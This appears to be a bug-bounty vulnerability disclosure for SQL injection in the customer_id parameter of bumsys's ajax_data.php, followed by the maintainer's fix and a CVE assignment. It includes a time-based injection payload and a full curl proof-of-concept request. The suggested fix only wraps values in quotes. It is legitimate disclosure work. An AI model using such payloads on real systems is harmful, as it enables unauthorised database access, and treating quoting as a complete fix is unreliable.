SQL Injection in 'core/ajax/ajax_data.php' in unilogies/bumsys

Valid

Reported on

Feb 28th 2023


Description

There exists an SQL injection affecting the customer_id parameter located in the file core/ajax/ajax_data.php

Let's take a look at the following code: https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L537

                    where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0
                    

The core problem is that, even though the function safe_input() is used in an effort to sanitize the customer_id variable, as seen here https://github.com/unilogies/bumsys/blob/9dc2de204116297a7e528c38bc3b1e89bf40f907/core/ajax/ajax_data.php#L447

    $customer_id = isset($_GET["customer_id"]) ? safe_input($_GET["customer_id"]) : "";

The query itself however, assumes customer_id is always an integer, but this isnt enforced by quotes. Thus allowing us to inject SQL statements without ever needing to inject a quote.

Fix

change

                    where stock_product_id = {$product_id} and sales_customer_id = {$customer_id} and product_stock.is_trash = 0

to

                    where stock_product_id = '{$product_id}' and sales_customer_id = '{$customer_id}' and product_stock.is_trash = 0

Proof of Concept

Make a GET-request to http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1)) with a valid session and a valid CSRF-token and observe the delay introduced by calling SLEEP().

curl -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0' -H 'Connection: keep-alive' -H 'Cookie: eid=1; __5604118335cb0000a84ea1f5b9befc7b8de1bc72=9vrsravv229bb68gm7ejpldhoj;' -H 'X-CSRF-TOKEN: 5f185b523d036a55a162dbf63d8b45b600275e92' --url "http://bumsys.local/info?module=data&page=productDetailsForReturn&product_id=2&customer_id=0+OR+(SELECT+SLEEP(1))"

Impact

Authenticated users are able to disclose the contents of the database.

We are processing your report and will contact the unilogies/bumsys team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the unilogies/bumsys team and are waiting to hear back a year ago
Khurshid Alam validated this vulnerability a year ago

Good finding. Will fix soon. Thank you

tsarsecurity has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Khurshid Alam marked this as fixed in v2.0.2 with commit 6a328e a year ago
Khurshid Alam has been awarded the fix bounty
This vulnerability has now been published a year ago
Khurshid Alam
a year ago

Maintainer


@admin, please assign a CVE.

Ben Harvie
a year ago

Admin


CVE assigned as requested:)

to join this conversation